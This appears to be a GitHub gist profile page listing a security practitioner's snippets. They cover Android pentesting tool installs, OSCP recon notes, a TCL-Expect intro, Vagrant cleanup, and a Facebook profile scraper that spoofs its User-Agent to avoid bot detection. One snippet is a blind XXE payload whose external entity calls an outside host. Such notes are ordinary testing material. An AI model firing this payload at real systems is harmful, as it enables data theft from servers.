Chan9390

Keybase proof

I hereby claim:

• I am Chan9390 on github.
• I am bnchandrapal (https://keybase.io/bnchandrapal) on keybase.
• I have a public key whose fingerprint is 98C9 6416 8336 1634 9297 8413 B33F B311 B5A1 3BEF

To claim this, I am signing this object:

Chan9390

sudo apt-get install andbug androbugs-framework androidtamer-adb androidtamer-dev androidtamer-dynamicanalysis androidtamer-essential androidtamer-forensics androidtamer-full androidtamer-manualanalysis androidtamer-menuitems androidtamer-menu androidtamer-optional androidtamer-pentesting androidtamer-reporting androidtamer-re androidtamer-romdev androidtamer-wallpaper apk2java apktool burpsuite-free bytecode-viewer classyshark dex2jar dextra droid-ff drozer-checks drozer enjarify imgtool j0din3 jaadas jad jadx jd-gui mobsf python-cement python-configparser python-dateutil python-flask-restless python-flask python-frida python-graphviz python-mimeparse python-mimerender python-prompt-toolkit python-psutil python-pyfiglet python-pygments python-six python-wcwidth python-xhtml2pdf rubygem-dex-oracle rubygem-rubyzip simplify smali spflashtool sslscan vboxmanage yadd-dumper zaproxy

Chan9390

import jeb.api.IScript;
import jeb.api.JebInstance;
import jeb.api.ast.*;
import jeb.api.ast.Class;
import jeb.api.dex.*;
import jeb.api.ui.JavaView;
import jeb.api.ui.View;

import java.util.Arrays;
import java.util.HashMap;

Chan9390

How to pass the OSCP

1. Recon
2. Find vuln
3. Exploit
4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

Chan9390

Intro

TCL-Expect scripts are an amazingly easy way to script out laborious tasks in the shell when you need to be interactive with the console. Think of them as a "macro" or way to programmaticly step through a process you would run by hand. They are similar to shell scripts but utilize the .tcl extension and a different #! call.

Setup Your Script

The first step, similar to writing a bash script, is to tell the script what it's executing under. For expect we use the following:

#!/usr/bin/expect

Chan9390

import requests
from bs4 import BeautifulSoup as bs

profile = "https://www.facebook.com/<profile_name>"

headers = {
	'accept':'*/*',
	'accept-language':'en-US,en;q=0.8',
	'User-Agent': 'Put any authentic header here. If not, facebook can understand this is bot script and the details will be striped',
	'referer':profile

Chan9390

import requests
from bs4 import BeautifulSoup as bs

profile = "https://www.facebook.com/<profile_name>"

r = requests.get(profile, headers=headers)
soup = bs(r.text, "lxml")
m = soup.find("img", {"class":"profilePic img"})
info = m.get('alt')
print info

Chan9390

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

Chan9390

#!/bin/sh

# Credits to:
#  - http://vstone.eu/reducing-vagrant-box-size/
#  - https://github.com/mitchellh/vagrant/issues/343

aptitude -y purge ri
aptitude -y purge installation-report landscape-common wireless-tools wpasupplicant ubuntu-serverguide
aptitude -y purge python-dbus libnl1 python-smartpm python-twisted-core libiw30
aptitude -y purge python-twisted-bin libdbus-glib-1-2 python-pexpect python-pycurl python-serial python-gobject python-pam python-openssl libffi5

Chan9390

GSoC 2017

My works:

Closed multiple issues

• #70 - waiting for ssh become available
• #74 - Tomcat Server Failure with provisioning 'C:\ProgramData\chocolatey\lib\Tomcat\tools\chocolateyInstall.ps1'
• #90 - Vagrant up errors - Kali
• #95 - killed it in the end while exporting .ovf file
• #102 - microsoft_updates.bat fails